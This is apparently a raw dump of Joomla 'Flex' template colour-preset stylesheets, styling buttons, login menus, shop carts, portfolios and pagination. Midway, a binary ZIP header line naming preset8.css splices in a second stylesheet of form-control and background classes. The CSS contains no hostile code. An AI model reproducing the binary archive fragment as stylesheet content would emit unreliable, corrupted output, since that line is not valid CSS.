.sppb-btn-flex.sppb-btn-outline:focus,
.sppb-btn-flex.sppb-btn-outline:active,
.sppb-btn-flex.sppb-btn-outline.active,
.sppb-btn-flex.open > .dropdown-toggle.sppb-btn-outline {
  border-color: #dfb59a;
  color: #fff;
  background-color: rgba(204,139,96,0.7);
}
.btn-flex.sppb-btn-3d,
.btn-flex.sppb-btn-3d:hover,
.btn-flex.sppb-btn-3d.focus,
.btn-flex.sppb-btn-3d:focus,
.btn-flex.sppb-btn-3d:active,
.btn-flex.sppb-btn-3d.active,
.btn-flex.open > .dropdown-toggle.sppb-btn-3d,
.sppb-btn-flex.sppb-btn-3d,
.sppb-btn-flex.sppb-btn-3d:hover,
.sppb-btn-flex.sppb-btn-3d.focus,
.sppb-btn-flex.sppb-btn-3d:focus,
.sppb-btn-flex.sppb-btn-3d:active,
.sppb-btn-flex.sppb-btn-3d.active,
.sppb-btn-flex.open > .dropdown-toggle.sppb-btn-3d {
  border-bottom-color: #d8a787;
}
.light >i {
  color: #ebd1c1;
}
.light:hover i {
  color: #f1e0d4;
}
ul.social-icons >li a:hover,
ul.social-icons >li a:hover > i {
  -webkit-transition: all 300ms;
  transition: all 300ms;
  color: #f1e0d4;
}
.login .title i.pe,
.registration .title i.pe {
  color: #e5c3ad;
}
.ap-login a i.pe,
.ap-signin a i.pe {
  color: #e5c3ad;
}
.ap-modal-login .modal-dialog {
  color: #000000;
}
.ap-modal-login .title i.pe {
  color: #e5c3ad;
}
.ap-modal-login .modal-content .modal-body .forget-name-link a {
  color: #000000 !important;
}
.ap-modal-login .modal-content .modal-body .forget-name-link a:hover {
  color: #cc8b60 !important;
}
.ap-modal-login .modal-content .modal-footer a:hover {
  color: #cc8b60 !important;
}
.view-profile .select-menu select {
  display: block;
}
.view-profile button:focus {
  outline: none;
}
.view-profile a[title="Cancel"] {
  background-color: #888888;
  color: #fff;
}
.view-profile a[title="Cancel"]:hover {
  background-color: #6f6f6f;
}
.ap-my-account-menu .signin-img-wrap i.pe {
  color: #f1e0d4;
}
.ap-my-account-menu .dropdown-menu ul.menu >li a {
  color: #000000 !important;
}
.ap-my-account-menu .dropdown-menu ul.menu >li a:hover {
  background-color: rgba(204,139,96,0.8);
  color: #fff !important;
}
.ap-my-account-menu .dropdown-menu ul.menu >li a:hover::before {
  color: #f1e0d4;
}
.ap-my-account-menu .dropdown-menu ul.menu >li:last-child a {
  color: #cc8b60;
}
.ap-my-account-menu .dropdown-menu ul.menu >li:last-child a:hover {
  background-color: rgba(204,139,96,0.8);
  color: #fff;
}
.ap-my-account-menu .dropdown-menu ul.menu >li:last-child a:hover i {
  color: #fff;
}
.ap-my-account-menu .dropdown-menu ul.menu >li:last-child a i {
  color: #cc8b60;
}
.ap-my-account-menu .dropdown-menu ul.menu >li.active > a {
  background-color: rgba(204,139,96,0.8);
  color: #fff !important;
}
.login-wrapper >i.pe,
.registration-wrapper >i.pe,
.reset-wrapper >i.pe,
.remind-wrapper >i.pe {
  color: rgba(204,139,96,0.07);
}
.login-wrapper >i.pe {
  color: rgba(85,85,85,0.02);
}
#sp-top-bar ul.social-icons >li a:hover,
#sp-top-bar ul.social-icons >li a:hover > i {
  -webkit-transition: all 300ms;
  transition: all 300ms;
  color: #d29973;
}
#sp-top-bar.onepage {
  box-shadow: inset 0 1px 0px rgba(0,0,0,0.05), inset 0 -1px 0px rgba(0,0,0,0.1);
}
#sp-top-bar.onepage .sp-contact-info li i {
  color: #b56b3a;
}
#sp-top-bar.onepage .ap-login a i.pe,
#sp-top-bar.onepage .ap-signin a i.pe {
  color: #b56b3a;
}
.sp-contact-info li a:hover {
  color: #dfb59a;
}
.sp-contact-info li i {
  color: #dfb59a;
}
.sp-module-content .mod-languages ul.lang-block li.lang-active a i {
  color: #e5c3ad;
}
ol.breadcrumb li a:hover {
  color: #ebd1c1;
}
.sp-module ul >li >a,
.sppb-addon-module ul >li >a {
  color: #1a1a1a;
}
.sp-module ul >li >a:hover,
.sppb-addon-module ul >li >a:hover {
  color: #cc8b60;
}
.sp-module.white .sppb-addon-content ol >span,
.sppb-addon-module.white .sppb-addon-content ol >span {
  color: #e2e2e2;
}
.sp-module.white .sppb-addon-content ol li,
.sppb-addon-module.white .sppb-addon-content ol li {
  color: #e2e2e2;
}
.sp-module.white .sppb-addon-content ol li a,
.sppb-addon-module.white .sppb-addon-content ol li a {
  color: #fff;
}
.sp-module.white .sppb-addon-content ol li a:hover,
.sppb-addon-module.white .sppb-addon-content ol li a:hover {
  color: #ebd1c1;
}
.sp-module.dark ul >li >span >a,
.sppb-addon-module.dark ul >li >span >a {
  color: #d29973;
}
.sp-module.dark ul >li >span >a:hover,
.sppb-addon-module.dark ul >li >span >a:hover {
  color: #e5c3ad;
}
.sp-module.dark ul >li >a,
.sppb-addon-module.dark ul >li >a {
  color: #d8a787 !important;
}
.sp-module.dark ul >li >a:hover,
.sppb-addon-module.dark ul >li >a:hover {
  color: #ebd1c1 !important;
}
.sp-module .latestnews >div >a,
.sppb-addon-module .latestnews >div >a {
  color: #000000;
}
.sp-module .latestnews >div >a:hover,
.sppb-addon-module .latestnews >div >a:hover {
  color: #cc8b60;
}
.sp-module ul.category-module >li >a,
.sp-module .relateditems >li >a,
.sppb-addon-module ul.category-module >li >a,
.sppb-addon-module .relateditems >li >a {
  color: #d8a787;
}
.sp-module ul.category-module >li >a >div.related-date,
.sp-module .relateditems >li >a >div.related-date,
.sppb-addon-module ul.category-module >li >a >div.related-date,
.sppb-addon-module .relateditems >li >a >div.related-date {
  color: #999999;
}
.sp-module ul.category-module >li >a >div.related-date >i,
.sp-module .relateditems >li >a >div.related-date >i,
.sppb-addon-module ul.category-module >li >a >div.related-date >i,
.sppb-addon-module .relateditems >li >a >div.related-date >i {
  color: #e5c3ad;
}
.sp-module ul.category-module >li span,
.sp-module ul.category-module >li p,
.sp-module .relateditems >li span,
.sp-module .relateditems >li p,
.sppb-addon-module ul.category-module >li span,
.sppb-addon-module ul.category-module >li p,
.sppb-addon-module .relateditems >li span,
.sppb-addon-module .relateditems >li p {
  color: #999999;
}
.sp-module ul.category-module >li span >i,
.sp-module ul.category-module >li p >i,
.sp-module .relateditems >li span >i,
.sp-module .relateditems >li p >i,
.sppb-addon-module ul.category-module >li span >i,
.sppb-addon-module ul.category-module >li p >i,
.sppb-addon-module .relateditems >li span >i,
.sppb-addon-module .relateditems >li p >i {
  color: #e5c3ad;
}
.sp-module ul.category-module >li a.mod-articles-category-title,
.sppb-addon-module ul.category-module >li a.mod-articles-category-title {
  color: #000000;
}
.sp-module ul.category-module >li a.mod-articles-category-title:hover,
.sppb-addon-module ul.category-module >li a.mod-articles-category-title:hover {
  color: #cc8b60;
}
.sp-module .tagscloud .tag-name,
.sppb-addon-module .tagscloud .tag-name {
  color: #666666;
}
.sp-module .tagscloud .tag-name:hover,
.sppb-addon-module .tagscloud .tag-name:hover {
  background: #d29973;
  border-color: #cc8b60;
  color: #fff;
}
.tag-category ul.category li h3 >a {
  color: #595959;
}
.tag-category ul.category li h3 >a:hover {
  color: #cc8b60;
}
.tags a.label {
  background-color: rgba(45,45,45,0.45);
}
.tags a.label:hover {
  background: #d29973;
}
.tags >span >i {
  color: #c4c4c4;
}
.tags:hover >span >i {
  color: #919191;
}
.sp-simpleportfolio .sp-simpleportfolio-filter > ul.simple > li > a {
  color: #1a1a1a;
}
.sp-simpleportfolio .sp-simpleportfolio-filter > ul.simple > li > a:hover {
  color: #cc8b60;
}
.sp-simpleportfolio .sp-simpleportfolio-filter > ul.simple > li.active > a {
  color: #cc8b60;
}
.sp-simpleportfolio .sp-simpleportfolio-filter > ul.simple > li.active > a:hover {
  color: #cc8b60;
}
.sp-simpleportfolio .sp-simpleportfolio-filter > ul.simple > li span.simple-divider {
  color: #f7eee7;
}
.sp-simpleportfolio .sp-simpleportfolio-filter > ul.flex > li.active > a,
#mod-sp-simpleportfolio .sp-simpleportfolio-filter > ul.flex > li.active > a {
  background: #cc8b60;
}
.sp-simpleportfolio .sp-simpleportfolio-filter > ul.flex > li > a:hover,
#mod-sp-simpleportfolio .sp-simpleportfolio-filter > ul.flex > li > a:hover {
  background: #cc8b60;
}
.sp-simpleportfolio .sp-simpleportfolio-item .sp-simpleportfolio-btns a,
#mod-sp-simpleportfolio .sp-simpleportfolio-item .sp-simpleportfolio-btns a {
  background-color: #cc8b60;
  background-color: rgba(204,139,96,0.8);
}
.sp-simpleportfolio .sp-simpleportfolio-item .sp-simpleportfolio-btns a:hover,
#mod-sp-simpleportfolio .sp-simpleportfolio-item .sp-simpleportfolio-btns a:hover {
  background-color: #cc8b60;
  box-shadow: 0 1px 3px rgba(0,0,0,0.3);
}
.sp-simpleportfolio .sp-simpleportfolio-meta .sp-module:hover h3 > i.fa {
  color: #cc8b60;
}
.sp-simpleportfolio-info .sp-simpleportfolio-tags i.fa {
  color: #d8a787;
}
input[type="text"]:focus {
  border: 1px solid #cc8b60;
}
.search input#mod-search-searchword:focus,
.search input#search-searchword:focus,
.search input#mod_virtuemart_search:focus {
  border: 1px solid #cc8b60;
}
.search:before {
  color: #d8a787;
}
.search:hover:before,
.search:focus:before,
.search:active:before {
  color: #1a1a1a;
}
.search .btn-toolbar button {
  background: #cc8b60;
}
.post-format-masonry > i {
  background-color: #cc8b60;
  background-color: rgba(204,139,96,0.7);
}
.post-format {
  background-color: #cc8b60;
  background-color: rgba(204,139,96,0.9);
}
.entry-link,
.entry-quote {
  background-color: #cc8b60;
  background-color: rgba(204,139,96,0.9);
}
blockquote {
  border-color: #cc8b60;
}
.sp-comingsoon body {
  background-color: #c67d4d;
}
.sp-comingsoon body #sp-comingsoon ul.social-icons >li a:hover,
.sp-comingsoon body #sp-comingsoon ul.social-icons >li a:hover i {
  color: #fff;
}
.sp-comingsoon body.with-bckg-img a.logo {
  background: rgba(20,20,20,0.45);
}
.sp-comingsoon body.with-bckg-img .days .number,
.sp-comingsoon body.with-bckg-img .hours .number,
.sp-comingsoon body.with-bckg-img .seconds .number,
.sp-comingsoon body.with-bckg-img .minutes .number {
  border: 1px solid rgba(255,255,255,0.5);
  background-color: rgba(0,0,0,0.2);
}
.sp-comingsoon body.with-bckg-img .social-icons {
  background-color: rgba(0,0,0,0.2);
}
.pagination>li>a,
.pagination>li>span {
  color: #000000;
}
.pagination>li>a:hover,
.pagination>li>a:focus,
.pagination>li>span:hover,
.pagination>li>span:focus {
  color: #000000;
}
.pagination>.active>a,
.pagination>.active>span {
  border-color: #cc8b60;
  background-color: #cc8b60;
}
.pagination>.active>a:hover,
.pagination>.active>a:focus,
.pagination>.active>span:hover,
.pagination>.active>span:focus {
  border-color: #cc8b60;
  background-color: #cc8b60;
}
.sppb-addon h3.sppb-addon-title {
  color: #1a1a1a;
}
.sppb-addon h3.sppb-addon-title:after {
  background: #d8a787;
}
.sppb-panel-default .sppb-panel-heading .sppb-panel-title >i {
  color: #666666;
}
.sppb-panel-default .sppb-panel-heading.active,
.sppb-panel-default .sppb-panel-heading.active:before {
  color: #cc8b60;
}
.sppb-panel-default .sppb-panel-heading.active .sppb-panel-title,
.sppb-panel-default .sppb-panel-heading.active:before .sppb-panel-title {
  color: #cc8b60;
}
.sppb-panel-default .sppb-panel-heading.active .sppb-panel-title >i,
.sppb-panel-default .sppb-panel-heading.active:before .sppb-panel-title >i {
  color: #d8a787;
}
.sppb-panel-primary {
  border: none;
}
.sppb-panel-primary >.sppb-panel-heading {
  background-color: #cc8b60;
}
.sppb-panel-flex >.sppb-panel-heading .sppb-panel-title >i {
  color: #666666;
}
.sppb-panel-flex >.sppb-panel-heading:after {
  color: #808080;
}
.sppb-panel-flex >.sppb-panel-heading.active {
  border-bottom: 1px solid #cc8b60;
}
.sppb-panel-flex >.sppb-panel-heading.active:after {
  color: #cc8b60;
}
.sppb-panel-flex >.sppb-panel-heading.active .sppb-panel-title >i {
  color: #cc8b60;
}
.sppb-panel-flex >.sppb-panel-heading +.sppb-panel-collapse > .sppb-panel-body {
  border-bottom: 1px solid #cc8b60;
}
.sppb-addon-countdown.flex .sppb-countdown-number {
  background-color: #cc8b60;
  border: 2px solid rgba(0,0,0,0.2);
  text-shadow: 1px 1px 1px rgba(0,0,0,0.3);
}
.entry-header h1 a,
.entry-header h2 a {
  color: #000000;
}
.entry-header h1 a:hover,
.entry-header h1 a:focus,
.entry-header h2 a:hover,
.entry-header h2 a:focus {
  color: #cc8b60;
}
.entry-header h1:after,
.entry-header h2:after {
  background: #d8a787;
}
.html-style span {
  background: #d6a27f;
}
ul.site-list li {
  color: #000000;
}
ul.site-list li i {
  color: #d6a27f;
}
.bullets .li-circle {
  color: #cc8b60;
}
.dropcaps .naked-drop span {
  color: #cc8b60;
}
.dropcaps .full-drop span {
  background: #cc8b60;
}
.sp-module .sp-module-title {
  color: #1a1a1a;
}
.sp-module .sp-module-title:after {
  background: #d8a787;
}
.cd-pagination li.active >a {
  background-color: #cc8b60;
  color: #fff;
}
.cd-pagination a {
  background-color: #fafafa;
}
.cd-pagination a:hover,
.cd-pagination a:focus {
  background-color: #cc8b60;
  color: #fff;
}
.cd-pagination a:active {
  background-color: #965930;
}
.sppb-addon-single-image .sppb-addon-content a .overlay >i:before {
  background-color: rgba(204,139,96,0.8);
}
.sppb-addon-single-image .sppb-addon-content a .overlay:after {
  background-color: rgba(51,51,51,0.25);
  box-shadow: inset 0 0 50px rgba(51,51,51,0.9);
}
.sppb-progress .sppb-progress-bar-default,
.sppb-progress .sppb-progress-bar.flex,
.sppb-progress .sppb-progress-bar.custom {
  background-color: #cc8b60;
}
.sppb-nav-tabs >li >a {
  color: #cc8b60;
}
.sppb-nav-tabs >li.active >a {
  color: #333333;
}
.flex .sppb-tab .sppb-nav-tabs >li.active >a {
  border-top-color: #d8a787;
}
.flex .sppb-tab .sppb-nav-tabs >li.active >a:hover,
.flex .sppb-tab .sppb-nav-tabs >li.active >a:focus {
  border-top-color: #d8a787;
}
.sppb-nav-modern >li >a {
  background: transparent;
  color: #333333;
}
.sppb-nav-modern >li.active >a {
  color: #cc8b60;
}
.sppb-nav-modern >li.active >a:hover,
.sppb-nav-modern >li.active >a:focus {
  color: #cc8b60;
}
.sppb-nav-lines >li >a {
  background: transparent;
}
.sppb-nav-lines >li >a >i {
  color: #666666;
}
.sppb-nav-lines >li >a:hover >i,
.sppb-nav-lines >li >a:focus >i {
  color: #333333;
}
.sppb-nav-lines >li.active >a,
.sppb-nav-lines >li.active >a:focus,
.sppb-nav-lines >li.active >a:hover {
  background-color: transparent;
  color: #cc8b60;
  border-bottom-color: #cc8b60;
}
.sppb-nav-lines >li.active >a >i,
.sppb-nav-lines >li.active >a:focus >i,
.sppb-nav-lines >li.active >a:hover >i {
  color: #cc8b60;
}
.sppb-nav-pills >li >a {
  color: #333333;
  background: transparent;
}
.sppb-nav-pills >li >a >i {
  color: #666666;
}
.sppb-nav-pills >li >a:hover >i,
.sppb-nav-pills >li >a:focus >i {
  color: #333333;
}
.sppb-nav-pills >li.active >a {
  background-color: transparent;
  color: #cc8b60;
  box-shadow: inset 0 0 0 1px #cc8b60;
}
.sppb-nav-pills >li.active >a >i {
  color: #cc8b60;
}
.sppb-addon-testimonial .sppb-addon-testimonial-rating i.fa-star {
  color: #d8a787;
}
.sppb-addon-testimonial .sppb-addon-testimonial-rating i.fa-star-o {
  color: #c0c0c0;
}
.pro-client-url {
  color: #cc8b60;
}
.sppb-pricing-box {
  box-shadow: inset 0 0 1px #999999;
}
.sppb-pricing-box.sppb-pricing-featured {
  background: transparent;
}
.sppb-pricing-box.sppb-pricing-featured .sppb-pricing-header {
  background-color: #cc8b60;
}
.sppb-pricing-box.sppb-pricing-featured .sppb-pricing-features {
  color: #000000;
}
.sppb-addon-latest-posts .latest-post .latest-post-inner div.img-wrapper,
.sppb-addon-latest-posts .latest-post .latest-post-item div.img-wrapper {
  position: relative;
  overflow: hidden;
  max-width: 100%;
}
.sppb-addon-latest-posts .latest-post .latest-post-inner div.img-wrapper >a:after,
.sppb-addon-latest-posts .latest-post .latest-post-item div.img-wrapper >a:after {
  background: #cc8b60;
}
.sppb-addon-latest-posts .latest-post .latest-post-inner h2.entry-title a,
.sppb-addon-latest-posts .latest-post .latest-post-item h2.entry-title a {
  color: #404040;
}
.sppb-addon-latest-posts .latest-post .latest-post-inner:hover h2.entry-title a,
.sppb-addon-latest-posts .latest-post .latest-post-item:hover h2.entry-title a {
  color: #cc8b60;
}
.light .sppb-selector span i {
  color: #f1e0d4;
}
.light .sppb-selector >i {
  color: #ebd1c1;
}
.light .sppb-selector:hover span i {
  color: #fff;
}
.light .sppb-selector:hover i {
  color: #f1e0d4;
}
.flex .sppb-addon-content .gm-zoom-in,
.flex .sppb-addon-content .gm-zoom-out {
  background-color: #d8a787;
  opacity: 0.77;
}
.flex .sppb-addon-content .gm-zoom-in:hover,
.flex .sppb-addon-content .gm-zoom-out:hover {
  background-color: #d29973;
  opacity: 1;
}
.sppb-addon .sppb-icon {
  color: #cc8b60;
  line-height: 1.5;
}
.sppb-media.default >a:hover img.sppb-media-object,
.sppb-media.flex >a:hover img.sppb-media-object {
  border-color: #cc8b60;
}
.sppb-media.default >a:hover >i,
.sppb-media.flex >a:hover >i {
  border-color: #cc8b60;
}
.sppb-media.default >.sppb-media-body >i.fa,
.sppb-media.flex >.sppb-media-body >i.fa {
  color: #f1e0d4;
}
.sppb-media footer strong {
  color: #d29973;
}
.sp-module .sp-module-title,
.sppb-addon-module .sp-module-title {
  color: #1a1a1a;
}
.sp-module .sp-module-title .divider,
.sppb-addon-module .sp-module-title .divider {
  background: #d8a787;
}
.sp-module .divider,
.sppb-addon-module .divider {
  background: #cccccc;
}
.sppb-ajaxt-contact-form .sppb-form-group .sppb-form-control[placeholder]::-webkit-input-placeholder:before {
  color: #e5c3ad;
}
.sppb-ajaxt-contact-form .sppb-form-group .sppb-form-control[placeholder]:focus {
  border: 1px solid #d29973;
  box-shadow: 0 0 5px rgba(204,139,96,0.3);
}
.sppb-addon-ajax-contact.dark .sppb-form-group label {
  color: #ddd;
  color: rgba(255,255,255,0.65);
}
.sppb-addon-ajax-contact.dark .sppb-form-control label {
  color: #ddd;
  color: rgba(255,255,255,0.65);
}
.sppb-addon-ajax-contact.dark .sppb-form-control[placeholder] {
  color: #f0f0f0;
  border: 1px solid #999;
  border: 1px solid rgba(200,200,200,0.8);
  background: transparent;
}
.sppb-addon-ajax-contact.dark .sppb-form-control[placeholder]::-moz-placeholder {
  color: rgba(255,255,255,0.65);
}
.sppb-addon-ajax-contact.dark .sppb-form-control[placeholder]::-webkit-input-placeholder {
  color: rgba(255,255,255,0.65);
}
.sppb-addon-ajax-contact.dark .sppb-form-control[placeholder]::-webkit-input-placeholder:before {
  color: #dbad8e;
}
.sppb-addon-ajax-contact.dark .sppb-form-control[placeholder]:focus {
  border: 1px solid #dfb59a;
}
.sppb-addon-ajax-contact.dark .tos label {
  color: #ddd;
  color: rgba(255,255,255,0.65);
}
.sppb-addon-ajax-contact.dark .tos label a {
  color: #dfb59a;
}
.sppb-addon-ajax-contact.dark .tos label a:hover {
  color: #ebd1c1;
}
.dark .acymailing_form input.inputbox {
  color: #e1bba2;
}
.dark .acymailing_form input.inputbox:focus {
  border: 1px solid #dfb59a;
}
.sppb-addon-timeline .sppb-addon-timeline-wrapper:before {
  background-color: #e5c3ad !important;
}
.sppb-addon-timeline .sppb-addon-timeline-wrapper .timeline-badge:before {
  border: 2px solid #d8a787 !important;
}
.sppb-addon-timeline .sppb-addon-timeline-wrapper .timeline-badge:after {
  background-color: #e5c3ad !important;
}
.error-page .error-page-inner >div.container .btn-error {
  background: #d29973;
}
.error-page .error-page-inner >div.container .btn-error:hover {
  background: #cc8b60;
}
.error-page .error-page-inner >div.container .fa-exclamation-triangle {
  color: #dfb59a;
}
.error-page .error-page-inner >div.container .error-code {
  color: #d8a787;
}
.error-page .error-page-inner.with-bckg-img div.container .pe-7s-compass {
  color: #fff;
  text-shadow: 1px 3px 6px rgba(0,0,0,0.1);
}
.error-page .error-page-inner.with-bckg-img div.container .error-code {
  color: #d29973;
}
.sp-layer h1,
.sp-layer h2,
.sp-layer h3,
.sp-layer h4,
.sp-layer h5,
.sp-layer h6,
.sp-layer i.major_color {
  color: #d29973;
}
.sp-button {
  border-color: #dfb59a !important;
}
.sp-selected-button {
  background-color: #cc8b60 !important;
}
.vmCartModule #cd-lateral-nav .cd-navigation {
  color: #000000;
}
.vmCartModule #cd-lateral-nav .cd-navigation .cart-item .product_name a {
  color: #cc8b60 !important;
}
.vmCartModule #cd-lateral-nav .cd-navigation .cart-item .product_name a:hover {
  color: #a96436 !important;
}
.vmCartModule #cd-lateral-nav .cd-navigation .show-cart {
  color: #fff;
}
.quantity {
  background-color: rgba(204,139,96,0.8);
}
.cd-customization .add-to-cart {
  background-color: #cc8b60;
}
.cd-customization .add-to-cart:hover {
  background-color: #c37745;
}
.no-touch .cd-customization .add-to-cart:hover {
  background-color: #c37745;
}
.productdetails-view .vm-product-details-inner .product-price .vm-price-desc+span {
  color: #cc8b60;
}
.productdetails-view .vm-product-details-inner .product-short-description h4 {
  color: #555;
}
.productdetails-view .vm-product-details-inner .product-short-description h4 >i {
  color: #dbad8e;
}
.productdetails-view .vm-product-details-inner .product-neighbours a.previous-page:before,
.productdetails-view .vm-product-details-inner .product-neighbours a.previous-page:after,
.productdetails-view .vm-product-details-inner .product-neighbours a.next-page:before,
.productdetails-view .vm-product-details-inner .product-neighbours a.next-page:after {
  color: #fff;
  background: rgba(85,85,85,0.3);
}
.productdetails-view .vm-product-details-inner .product-neighbours a.previous-page:hover:before,
.productdetails-view .vm-product-details-inner .product-neighbours a.previous-page:hover:after,
.productdetails-view .vm-product-details-inner .product-neighbours a.next-page:hover:before,
.productdetails-view .vm-product-details-inner .product-neighbours a.next-page:hover:after {
  background: #cc8b60;
}
.productdetails-view .vm-product-details-inner .product-neighbours .empty-previous-page,
.productdetails-view .vm-product-details-inner .product-neighbours .empty-next-page {
  color: #fff;
  text-shadow: 1px 1px 0px rgba(85,85,85,0.08);
  box-shadow: inset 0 0 0 1px rgba(85,85,85,0.08);
}
.productdetails-view .icons a {
  box-shadow: inset 0 0 0 1px rgba(85,85,85,0.1);
}
.productdetails-view .icons a:hover {
  color: #fff;
  background: rgba(204,139,96,0.8);
}
.productdetails-view .products-desc-tab .nav-tabs >li.active >a {
  background: transparent;
  border-bottom: 1px solid #fff;
  border-right: 1px solid #e2e2e2;
  border-left: 1px solid #e2e2e2;
  box-shadow: 0 -1px 0px #cc8b60;
  border-top: 1px solid rgba(204,139,96,0.8);
}
.productdetails-view .products-desc-tab .tab-content .customer-reviews .list-reviews span.date >i {
  color: #dfb59a;
}
.empty_cart >i.pe >span {
  color: #fff;
  background-color: rgba(204,139,96,0.35);
}
#fancybox-wrap #fancybox-content .continue_link,
#fancybox-wrap #fancybox-content .showcart {
  color: #fff;
  background-color: #cc8b60;
}
.cart-view input[value="Logout"],
.cart-view input[name="changeShopper"],
.cart-view input[value="Search in shop"] {
  background-color: #cc8b60;
}
.cart-view input[value="Logout"]:hover,
.cart-view input[name="changeShopper"]:hover,
.cart-view input[value="Search in shop"]:hover {
  background: #c67d4d;
}
.cart-view fieldset.userdata #com-form-login-remember input {
  background-color: #cc8b60;
}
.cart-view fieldset.userdata #com-form-login-remember input:hover {
  background-color: #bd6f3c;
}
.cart-view .billto-shipto a.details {
  background: #cc8b60;
}
.cart-view .billto-shipto a.details:hover {
  background: #bd6f3c;
}
.cart-view table.cart-summary tr th {
  background: #cc8b60;
  border: solid 1px #cc8b60;
}
.cart-view table.cart-summary input.details-button {
  background: #cc8b60;
}
.cart-view table.cart-summary .vm2-add_quantity_cart {
  background: #cc8b60;
}
.sectiontableentry1 td a.change-payment {
  color: #d8a787;
}
.sectiontableentry1 td a.change-payment:hover {
  color: #cc8b60;
}
.vm-button-correct {
  background-color: #cc8b60;
}
.vm-button-correct:hover {
  background-color: #c67d4d;
}
.vm-button {
  background-color: #d8a787;
}
#com-form-login-remember input.default {
  background: #cc8b60;
}
#com-form-login-remember input.default:hover {
  background: #c67d4d;
}
.control-buttons .vm-button-correct {
  background-color: rgba(255,255,255,0.75);
  border-color: #666666;
  color: #666666;
}
.control-buttons .vm-button-correct:hover,
.control-buttons .vm-button-correct:focus {
  background-color: rgba(255,255,255,0.95);
  border-color: #cc8b60;
  color: #cc8b60;
}
.control-buttons button.default {
  background: #cc8b60;
}
.control-buttons button.default:hover {
  background: #c67d4d;
}
span.userfields_info {
  color: #cc8b60;
  border-bottom: 1px solid #cc8b60;
}
.orderby-displaynumber .vm-order-list .orderlistcontainer {
  border: 1px solid rgba(128,128,128,0.2);
}
.orderby-displaynumber .vm-order-list .orderlistcontainer .title:before {
  color: #959595;
}
.orderby-displaynumber .vm-order-list .orderlistcontainer .orderlist {
  border-left: 1px solid rgba(128,128,128,0.3);
  border-right: 1px solid rgba(128,128,128,0.3);
  background: rgba(255,255,255,0.9);
}
.orderby-displaynumber .vm-order-list .orderlistcontainer .orderlist div a {
  color: #000000;
  border-bottom: 1px solid rgba(128,128,128,0.3);
}
.sp-module-content ul.VMmenu li div > a >.nmb_products {
  color: #000000;
}
.vm-flex-search input:focus {
  border: 1px solid #cc8b60;
}
.vm-flex-search input:focus + .vm-search-button >i {
  color: #cc8b60;
}
.vm-flex-search .vm-search-button >i {
  color: #dfb59a;
}
.currency-selector-module button.btn >i,
.currency-selector-module input.btn >i {
  color: #555;
}
.currency-selector-module button.btn >i:hover,
.currency-selector-module input.btn >i:hover {
  color: #cc8b60;
}
.chzn-container-active .chzn-single {
  border: 1px solid #cc8b60 !important;
}
.chzn-container-active.chzn-with-drop .chzn-results li.highlighted {
  background: rgba(0,0,0,0.4);
}
.vm-price-box ins {
  color: #cc8b60;
}
.vm-menu .vm-title {
  border-top: 1px solid #d8a787;
}
.vm-menu ul.productdetails li .spacer-inner .PricesalesPrice {
  color: #cc8b60;
}
header.color .vm-menu .vm-title {
  color: #262626;
  border-top: 1px solid rgba(0,0,0,0.35);
}
header.color .vm-menu ul.productdetails li {
  box-shadow: 0 1px 0px rgba(0,0,0,0.35);
}
header.color .vm-menu ul.productdetails li .spacer-inner .PricesalesPrice {
  color: #000000;
}
header.color .vm-menu ul.productdetails:last-child li {
  box-shadow: none;
}
.alert-notice {
  box-shadow: 0 0 0 1px rgba(85,85,85,0.1), 0 2px 3px rgba(85,85,85,0.07);
}
@keyframes fade-in {
  to {
    opacity: 1;
    fill: rgba(204,139,96,0.9);
    stroke-dashoffset: 0;
    stroke-width: 0;
  }
}
@keyframes flex_after_fade_default {
  to {
    opacity: 1;
    stroke-width: 0;
    stroke-dashoffset: 0;
    fill: rgba(85,85,85,0.7);
    stroke: rgba(85,85,85,0.7);
  }
}
@keyframes flex_after_f_top {
  to {
    opacity: 1;
    stroke-width: 5;
    stroke-dashoffset: 0;
    fill: rgba(204,139,96,0.85);
    stroke: #cc8b60;
  }
}
PK!��\Qz�z�flex/css/presets/preset8.cssnu&1i�.form-control {
  display: block;
  height: 34px;
  padding: 6px 12px;
  font-size: 14px;
  line-height: 1.428571429;
  color: #555555;
  background-color: #fff;
  background-image: none;
  border: 1px solid #ccc;
  border-radius: 4px;
  -webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,0.075);
  box-shadow: inset 0 1px 1px rgba(0,0,0,0.075);
  -webkit-transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s;
  -moz-transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s;
  -o-transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s;
  transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s;
}
.form-control:focus {
  border-color: #66afe9;
  outline: 0;
  -webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,.075), 0 0 8px rgba(102,175,233,0.6);
  box-shadow: inset 0 1px 1px rgba(0,0,0,.075), 0 0 8px rgba(102,175,233,0.6);
}
.form-control::-moz-placeholder {
  color: #999;
  opacity: 1;
}
.form-control:-ms-input-placeholder {
  color: #999;
}
.form-control::-webkit-input-placeholder {
  color: #999;
}
.form-control[disabled],
.form-control[readonly],
fieldset[disabled] .form-control {
  cursor: not-allowed;
  background-color: #eeeeee;
  opacity: 1;
}
textarea.form-control {
  height: auto;
}
.major_color_bckg-100 {
  background-color: #f14833;
}
.major_color_bckg-90 {
  background-color: rgba(241,72,51,0.9);
}
.major_color_bckg-80 {
  background-color: rgba(241,72,51,0.8);
}
.major_color_bckg-70 {
  background-color: rgba(241,72,51,0.7);
}
.major_color_bckg-60 {
  background-color: rgba(241,72,51,0.6);
}
.major_color_bckg-50 {
  background-color: rgba(241,72,51,0.5);
}
.major_color_bckg-40 {
  background-color: rgba(241,72,51,0.4);
}
.major_color_bckg-30 {
  background-color: rgba(241,72,51,0.3);
}
.major_color_bckg-20 {
  background-color: rgba(241,72,51,0.2);
}
.major_color_bckg-10 {
  background-color: rgba(241,72,51,0.1);
}
.black_bckg-90 {
  background-color: rgba(0,0,0,0.9);
}
.black_bckg-80 {
  background-color: rgba(0,0,0,0.8);
}
.black_bckg-70 {
  background-color: rgba(0,0,0,0.7);
}
.black_bckg-60 {
  background-color: rgba(0,0,0,0.6);
}
.black_bckg-50 {
  background-color: rgba(0,0,0,0.5);
}
.black_bckg-40 {
  background-color: rgba(0,0,0,0.4);
}
.black_bckg-30 {
  background-color: rgba(0,0,0,0.3);
}
.black_bckg-20 {
  background-color: rgba(0,0,0,0.2);
}
.black_bckg-10 {
  background-color: rgba(0,0,0,0.1);
}
.white_bckg-90 {
  background-color: rgba(255,255,255,0.9);
}
.white_bckg-80 {
  background-color: rgba(255,255,255,0.8);
}
.white_bckg-70 {
  background-color: rgba(255,255,255,0.7);
}
